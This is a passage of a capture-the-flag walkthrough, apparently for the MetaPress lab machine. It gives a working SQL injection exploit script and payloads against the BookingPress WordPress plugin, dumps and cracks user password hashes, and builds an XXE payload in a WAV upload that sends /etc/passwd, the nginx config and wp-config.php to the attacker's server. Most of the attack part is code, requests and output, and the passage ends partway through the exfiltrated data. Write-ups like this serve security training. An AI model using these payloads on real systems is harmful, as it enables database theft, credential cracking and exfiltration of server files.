gainer = ') UNION ALL SELECT user_login,user_email,user_pass,NULL,NULL,NULL,NULL,NULL,NULL from wp_users limit 1 offset {off}-- -'

# Payload: ) AND ... -- - total(9)
def gen_payload(nonce, sqli_postfix, category_id=1):
    return {
        'action': 'bookingpress_front_get_category_services', # vulnerable action
        '_wpnonce': nonce,
        'category_id': category_id,
        'total_service': f'{randint(100, 10000)}{sqli_postfix}'
    }

if __name__ == '__main__':
    print('- BookingPress PoC')
    i = 0
    args = p.parse_args()
    url, nonce = args.url, args.nonce
    pool = requests.session()

    # Check if the target is vulnerable
    v_url = f'{url}/wp-admin/admin-ajax.php'
    proof_payload = gen_payload(nonce, trigger)

    res = pool.post(v_url, data=proof_payload)
    try:
        res = list(loads(res.text)[0].values())
    except Exception as e:
        print('-- Got junk... Plugin not vulnerable or nonce is incorrect')
        exit(-1)
    cnt = int(res[7])

    # Capture hashes
    print('-- Got db fingerprint: ', res[0])
    print('-- Count of users: ', cnt)
    for i in range(cnt):
        try:
            # Generate payload
            user_payload = gen_payload(nonce, gainer.format(off=i))
            u_data = list(loads(pool.post(v_url, user_payload).text)[0].values())
            print(f'|{u_data[0]}|{u_data[1]}|{u_data[2]}|')
        except: continue
```

Create a python script called bookingpress.py and give it execution permission:

```bash
sudo nano bookingpress.py
# Now we paste the code and save changes with CTRL-X and Yes.
chmod +x bookingpress.py
```

bookingpress.py requires two arguments: the first is "url" and the second is "nonce". The wpnonce is generated during the booking of an event in the browser. To obtain it, book a spot in the calendar and capture the traffic with BurpSuite. Here is the traffic intercepted:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://metapress.htb
Connection: close
Referer: http://metapress.htb/events/
Cookie: PHPSESSID=akporp33a92q48gn0afe6akrkt

action=bookingpress_front_get_timings&service_id=1&selected_date=2022-11-21&_wpnonce=f26ed88649
```

                        Now execute the script:

```bash
python bookingpress.py -u http://metapress.htb -n f26ed88649
```

                        And results:

```
- BookingPress PoC
-- Got db fingerprint:  10.5.15-MariaDB-0+deb11u1
-- Count of users:  2
|admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.|
|manager|manager@metapress.htb|$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70|
```

Curl command. Alternatively, we could use the following command:

```bash
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=f26ed88649&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
```

                        If you use it, remember to change the value of the NONCE parameter. Mine was f26ed88649.

                        Capturing the request with Burp

                        First, capture a request for an appointment booking with Burp Suite:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1054
Origin: http://metapress.htb
Connection: close
Referer: http://metapress.htb/events/
Cookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d

action=bookingpress_before_book_appointment&appointment_data[selected_category]=1&appointment_data[selected_cat_name]=&appointment_data[selected_service]=1&appointment_data[selected_service_name]=Startupmeeting&appointment_data[selected_service_price]=$0.00&appointment_data[service_price_without_currency]=0'-7502)+UNION+ALL+SELECT+group_concat(user_login),group_concat(user_pass),%40%40version_compile_os,1,2,3,4,5,6+from+wp_users--+-'&appointment_data[selected_date]=2022-11-15&appointment_data[selected_start_time]=10:00&appointment_data[selected_end_time]=10:30&appointment_data[customer_name]=&appointment_data[customer_firstname]=lolo&appointment_data[customer_lastname]=lolo&appointment_data[customer_phone]=7777777777&appointment_data[customer_email]=lolo@lolo.com&appointment_data[appointment_note]=<script>alert(1)</script>&appointment_data[selected_payment_method]=&appointment_data[customer_phone_country]=US&appointment_data[total_services]=&appointment_data[stime]=1668426666&appointment_data[spam_captcha]=In6ygQvJD9EB&_wpnonce=da775e35c6
```

As you can see in the captured traffic, since I restarted my machine due to unrelated issues, my wpnonce has shifted from f26ed88649 to da775e35c6. Send this request to the Repeater module (CTRL-R) and play with it. After a while testing, I could craft this request:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: http://metapress.htb
Connection: close
Referer: http://metapress.htb/events/
Cookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1;--+-'
```

                        For that, we have this response:

```
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 14 Nov 2022 08:20:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/8.0.24
Access-Control-Allow-Origin: http://metapress.htb
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 553

[{"bookingpress_service_id":"1","bookingpress_category_id":"1","bookingpress_service_name":"Startup meeting","bookingpress_service_price":"$0.00","bookingpress_service_duration_val":"30","bookingpress_service_duration_unit":"m","bookingpress_service_description":"Join us, we will celebrate our startup!","bookingpress_service_position":"0","bookingpress_servicedate_created":"2022-06-23 18:02:38","service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]
```

Cool. Let's now check what happens when the injected condition is false (for instance, replacing 1=1 with 1=2 in the same payload):

```
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 14 Nov 2022 08:22:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/8.0.24
Access-Control-Allow-Origin: http://metapress.htb
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 2

[]
```

So, when the condition is false (1=2), we get a different (empty) response from the server. This proves we are facing a SQL injection vulnerability.

Also, we could run a scan with the tool sqlmap to see if this request is vulnerable. Save the request in a file (in my case, I will call it bookrequest):

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: http://metapress.htb
Connection: close
Referer: http://metapress.htb/events/
Cookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9
```

                        Now run sqlmap:

```bash
sqlmap -r bookrequest
```

                        Extract from the results:

```
[03:30:05] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'total_service' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 436 HTTP(s) requests:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9) AND (SELECT 2533 FROM (SELECT(SLEEP(5)))kDHj) AND (2027=2027

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a717071,0x467874624e5a4862654847417a50625064757853724c584c57504443685668756446725643566d56,0x7171627a71),NULL,NULL-- -
---
[03:30:17] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:30:17] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 123 times
[03:30:17] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/metapress.htb'
```

This saves us some time. Now we know there are two SQLi vulnerabilities: the first is time-based blind, and the second is a UNION-query injection. We also know the query runs over a table with 9 columns, the seventh being the injectable one.

We could also have used the Repeater module in Burp Suite and sent one request for 9 columns and one for 10 columns (only the payloads are pasted):

```
# payload of 9 columns. In case of an empty response, the table would have 8 columns.

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1+order+by+9;--+-

# payload of 10 columns. In case of an empty response, the table would have 9 columns.

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1+order+by+10;--+-
```

                        Since we have an empty response with 10 columns we can conclude that the table has 9 columns.

                        To get which columns are being displayed, use this payload:

```
action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+all+1,2,3,4,5,6,7,8,9;--+-
```

                        In the body of the response, we obtain:

                        [{\"bookingpress_service_id\":\"1\",\"bookingpress_category_id\":\"2\",\"bookingpress_service_name\":\"3\",\"bookingpress_service_price\":\"$4.00\",\"bookingpress_service_duration_val\":\"5\",\"bookingpress_service_duration_unit\":\"6\",\"bookingpress_service_description\":\"7\",\"bookingpress_service_position\":\"8\",\"bookingpress_servicedate_created\":\"9\",\"service_price_without_currency\":4,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"}]\n

                        All of the columns are being displayed, and this makes sense since it is a UNION query.

Now we are ready to perform our attack using Burpsuite. These are the successive payloads:

```
# 1. Get the names of the databases:

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+table_schema,null,null,null,null,null,null,null,null+FROM+information_schema.tables;--+-

# Body of the response:

[{"bookingpress_service_id":"information_schema","bookingpress_category_id":null,"bookingpress_service_name":null,"bookingpress_service_price":"$0.00","bookingpress_service_duration_val":null,"bookingpress_service_duration_unit":null,"bookingpress_service_description":null,"bookingpress_service_position":null,"bookingpress_servicedate_created":null,"service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"},{"bookingpress_service_id":"blog","bookingpress_category_id":null,"bookingpress_service_name":null,"bookingpress_service_price":"$0.00","bookingpress_service_duration_val":null,"bookingpress_service_duration_unit":null,"bookingpress_service_description":null,"bookingpress_service_position":null,"bookingpress_servicedate_created":null,"service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]

# 2. Get the names of all tables from the selected database:

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+table_name,null,null,null,null,null,null,null,null+FROM+information_schema.tables+WHERE+table_schema=blog;--+-

# But since we are having some issues when using "WHERE" we will dump the database:

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+null,null,null,null,null,null,null,null,table_name+FROM+information_Schema.tables;--+-

# This will give us an extended response from which we need to read and select the interesting table. We will use filters in BurpSuite to locate all results related to USERS. And, as a matter of fact, we can locate a specific table (the common one in WordPress, by the way): wp_users. We will use this later.

# 3. Get the names of all columns of a selected table from a selected database. But since we are having problems using WHERE, we will dump all column names:

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+column_name,null,null,null,null,null,null,null,null+FROM+information_schema.columns;--+-

# Again, the response is vast. We can use the Burpsuite filter to find these two columns: user_pass and user_login

# 4. Now we can query the two columns we want (user_login and user_pass) from the table wp_users:

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+user_login,user_pass,null,null,null,null,null,null,null+FROM+wp_users;--+-

# And the body of the response:

[{"bookingpress_service_id":"admin","bookingpress_category_id":"$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.","bookingpress_service_name":null,"bookingpress_service_price":"$0.00","bookingpress_service_duration_val":null,"bookingpress_service_duration_unit":null,"bookingpress_service_description":null,"bookingpress_service_position":null,"bookingpress_servicedate_created":null,"service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"},{"bookingpress_service_id":"manager","bookingpress_category_id":"$P$B4aNM28N0E.tMy\/JIcnVMZbGcU16Q70","bookingpress_service_name":null,"bookingpress_service_price":"$0.00","bookingpress_service_duration_val":null,"bookingpress_service_duration_unit":null,"bookingpress_service_description":null,"bookingpress_service_position":null,"bookingpress_servicedate_created":null,"service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]
```

The same results, tabulated:

| user_login | user_pass |
| --- | --- |
| admin | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. |
| manager | $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 |

We are going to use John the Ripper and the dictionary rockyou.txt to crack the hashes.

                        Let's first create the file book.hash with the hashes we just found.

```bash
nano book.hash
```

                        We copy paste the hashes in different lines:

```
$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
```

Press CTRL-X and confirm with Y to save.

Now run John the Ripper:

```bash
john -w=/usr/share/wordlists/rockyou.txt book.hash
```

                        Results:

                        \n
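As an aside, hashcat can crack the same hashes: mode 400 covers the phpass format ($P$...) that WordPress uses. A sketch with the same wordlist:

```bash
# phpass / WordPress hashes are hashcat mode 400
hashcat -m 400 -a 0 book.hash /usr/share/wordlists/rockyou.txt

# Re-print cracked results later
hashcat -m 400 book.hash --show
```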

Log in to http://metapress.htb/wp-admin with the credentials of manager. After doing so, we realize that manager is a limited user: it does not have admin rights, but it can upload media.

After a little research (reading the documentation at wpscan.com), we can see that there is a specific vulnerability affecting:

• a logged-in user who is allowed to upload media.
• WordPress version 5.6.2.
• PHP version 8.

Since our user fits those parameters, let's read a little more about that vulnerability. Read here. Quoting:

                        Description: A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. WordPress used an audio parsing library called ID3 that was affected by an XML External Entity (XXE) vulnerability affecting PHP versions 8 and above. This particular vulnerability could be triggered when parsing WAVE audio files. Researchers at security firm SonarSource discovered this XML external entity injection (XXE) security flaw in the WordPress Media Library.

                        Impact:

• Arbitrary File Disclosure: The contents of any file on the host's file system could be retrieved, e.g. wp-config.php, which contains sensitive data such as database credentials.
                        • Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.

                        This is my first XXE attack! And it's also a pending subject for me because I was asked about it in a job interview for a pentester position and I didn't know how to answer. Great! No pain. Let's get our hands dirty =)

                        Wpscan provides us with a Proof Of Concept (POC):

1. Create payload.wav:

```
RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
```

2. Create xxe.dtd, the file we're going to serve:

```
<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">
```

My IP is 10.10.14.33, I will be using port 1234, and "xxe.dtd" is the name of the file on my server, so payload.wav would be built like this (echo -en interprets the escaped bytes):

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.33:1234/xxe.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```

And my xxe.dtd file, if I want to get the /etc/passwd file:

```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>" >
```

                        Now, in the same folder where we have saved xxe.dtd, run a php server. In my case:

```bash
php -S 10.10.14.33:1234
```

Now we are ready to upload payload.wav at http://metapress.htb/wp-admin/upload.php. After we do, in the command line from where we were serving our xxe.dtd file, we can read:

```
10.10.11.186:39962 [404]: GET /?p=jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw== - No such file or directory
```

We will use PHP to decode this. Create a .php file with the following code; just be sure to paste the base64 returned by the WordPress server where 'base64here' appears in the example:

```php
<?php echo zlib_decode(base64_decode('base64here')); ?>
```

                        In my case, I will call the file code.php, and it will have the following php content:

```php
<?php echo zlib_decode(base64_decode('jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw==')); ?>
```

Give execute permission to the file code.php and execute it:

```bash
chmod +x code.php
php code.php
```

                        Results:

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin
```

Users with a bash login shell are root and jnelson. Noted!
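As a side note, the same decode works without creating a file, using the php CLI directly ('base64here' again stands for the blob returned by the server):

```bash
# zlib_decode handles the raw DEFLATE stream produced by the zlib.deflate filter
php -r 'echo zlib_decode(base64_decode($argv[1]));' 'base64here'
```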

To request different content from the WordPress server, we only need to modify our xxe.dtd file and use a different path instead of "/etc/passwd". Common files to check out are:

• username/.ssh/id_rsa: a stolen private key would let us try to log in to the SSH server.
• /etc/shadow: to extract hashes.
• On a WordPress server, wp-config.php: here you can often find credentials.
• Logs and more...

Let's start with wp-config.php. We know from previous scans that the WordPress installation is running on an nginx server. Also, we know that the wp-config.php file is always located at the root of the WordPress installation. Reading the documentation, we can see that nginx has a file that lists the enabled sites and provides an absolute path to them: "/etc/nginx/sites-enabled/default". So, with that in mind, we can craft our xxe-nginx.dtd file with this content:

```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/nginx/sites-enabled/default">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>" >
```

                        And for our payload-nginx.wav, we run:

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.33:1234/xxe-nginx.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload-nginx.wav
```

                        Now, we start our php server:

```bash
php -S 10.10.14.33:1234
```

After uploading payload-nginx.wav from http://metapress.htb/wp-admin/upload.php, our php server will display:

```
10.10.11.186:45010 [404]: GET /?p=XVHbbsMgDH1OvsKr8tBOauhjlWrah+wSUQrEXQIIkybT0n37IK2qrpaMLHN8zjGQ9Cfp4SfPsxYpSAPbze5Wv1XVR5UaeeatDcBO3LNhGFgnA3deEpVN2LN9a3XCoDnIEeazdI27Vk3o2ngL10AFy6IJwdWNTfwEF4OHoOET0iTFXswsLsNnNMiVvCA1gCLTFkW/HetsJUERe9xPhiwm8vXgntNcefzTHI3/gvvCVDMLGhE2x8kkEHnZCCmOAWhcR0RpbBGRYbs2qsdJ4Le4FjNL+Z7wyIs5bbcrJXrSrLia9a813uOgssjTYJockZPR5dS6kmjmlDYiU56dbEjR4dxfej4mITjB9TGhlrZ3hzAKnXhPud/ - No such file or directory
```

                        With this code, we craft the file code-nginx.php and give it execution permissions:

```bash
nano code-nginx.php
```

                        The content of the file will be:

```php
<?php echo zlib_decode(base64_decode('XVHbbsMgDH1OvsKr8tBOauhjlWrah+wSUQrEXQIIkybT0n37IK2qrpaMLHN8zjGQ9Cfp4SfPsxYpSAPbze5Wv1XVR5UaeeatDcBO3LNhGFgnA3deEpVN2LN9a3XCoDnIEeazdI27Vk3o2ngL10AFy6IJwdWNpQBPL7D4x7ZYRTfwEF4OHoOET0iTFXswsLsNnNMiVvCA1gCLTFkW/HetsJUERe9xPhiwm8vXgntNcefzTHI3/gvvCVDMLGhE2x8kkEHnZCCmOAWhcR0RpbBGRYbs2qsdJ4Le4FjNL+Z7wyIs5bbcrJXrSrLia9a813uOgssjTYJockZPR5dS6kmjmlDYiU56dbEjR4dxfej4mITjB9TGhlrZ3hzAKnXhPud/')); ?>
```

                        Then we run:

```bash
php code-nginx.php
```

                        Results:

```
server {

        listen 80;
        listen [::]:80;

        root /var/www/metapress.htb/blog;

        index index.php index.html;

        if ($http_host != "metapress.htb") {
                rewrite ^ http://metapress.htb/;
        }

        location / {
                try_files $uri $uri/ /index.php?$args;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/var/run/php/php8.0-fpm.sock;
        }

        location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$ {
                expires max;
                log_not_found off;
        }

}
```

Nice, now we know that root is set to /var/www/metapress.htb/blog (line 6 of the config). With this, we also know the location of the wp-config.php file: /var/www/metapress.htb/blog/wp-config.php.

                        Following previous steps, now we need to craft:

                        • payload-wpconfig.wav file: to upload it to http://metapress.htb/wp-admin/upload.php.
                        • xxe-wpconfig.dtd file: that we will serve with a php server.

                        Let's craft xxe-wpconfig.dtd:

```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>" >
```

                        Now, craft the payload-wpconfig.wav file:

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.33:1234/xxe-wpconfig.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload-wpconfig.wav
```

                        Launch the php server from the folder where we want to share the file xxe-wpconfig.dtd:

```bash
php -S 10.10.14.33:1234
```

                        After uploading our payload-wpconfig.wav file from http://metapress.htb/wp-admin/upload.php, we can read from the command line from where we launched the php server:

```
10.10.11.186:57388 [404]: GET /?p=jVVZU/JKEH2+VvkfhhKMoARUQBARAoRNIEDCpgUhIRMSzEYyYVP87TdBBD71LvAANdNzTs/p6dMPaUMyTk9CgQBgJAg0ToVAFwFy/gsc4njOgkDUTdDVTaFhQssCgdDpiQBFWYMXAMtn2TpRI7ErgPGKPsGAP3l68glXW9HN6gHEtqC5Rf9+vk2Trf9x3uAsa+Ek8eN8g6DpLtXKuxix2ygxyzDCzMwteoX28088SbfQr2mUKJpxIRR9zClu1PHZ/FcWOYkzLYgA0t0LAVkDYxNySNYmh0ydHwVa+A+GXIlo0eSWxEZiXOUjxxSu+gcaXVE45ECtDIiDvK5hCIwlTps4S5JsAVl0qQXd5tEvPFS1SjDbmnwR7LcLNFsjmRK1VUtEBlzu7nmIYBr7kqgQcYZbdFxC/C9xrvRuXKLep1lZzhRWVdaI1m7q88ov0V8KO7T4fyFnCXr/qEK/7NN01dkWOcURa6/hWeby9AQEAGE7z1dD8tgpjK6BtibPbAie4MoCnCYAmlOQhW8jM5asjSG4wWN42F04VpJoMyX2iew7PF8fLO159tpFKkDElhQZXV4ZC9iIyIF1Uh2948/3vYy/2WoWeq+51kq524zMXqeYugXa4+WtmsazoftvN6HJXLtFssdM2NIre/18eMBfj20jGbkb9Ts2F6qUZr5AvE3EJoMwv9DJ7n3imnxOSAOzq3RmvnIzFjPEt9SA832jqFLFIplny/XDVbDKpbrMcY3I+mGCxxpDNFrL80dB2JCk7IvEfRWtNRve1KYFWUba2bl2WerNB+/v5GXhI/c2e+qtvlHUqXqO/FMpjFZh3vR6qfBUTg4Tg8Doo1iHHqOXyc+7fERNkEIqL1zgZnD2NlxfFNL+O3VZb08S8RhqUndU9BvFViGaqDJHFC9JJjsZh65qZ34hKr6UAmgSDcsik36e49HuMjVSMnNvcF4KPHzchwfWRng4ryXxq2V4/dF6vPXk/6UWOybscdQhrJinmIhGhYqV9lKRtTrCm0lOnXaHdsV8Za+DQvmCnrYooftCn3/oqlwaTju59E2wnC7j/1iL/VWwyItID289KV+6VNaNmvE66fP6Kh6cKkN5UFts+kD4qKfOhxWrPKr5CxWmQnbKflA/q1OyUBZTv9biD6Uw3Gqf55qZckuRAJWMcpbSvyzM4s2uBOn6Uoh14Nlm4cnOrqRNJzF9ol+ZojX39SPR60K8muKrRy61bZrDKNj7FeNaHnAaWpSX+K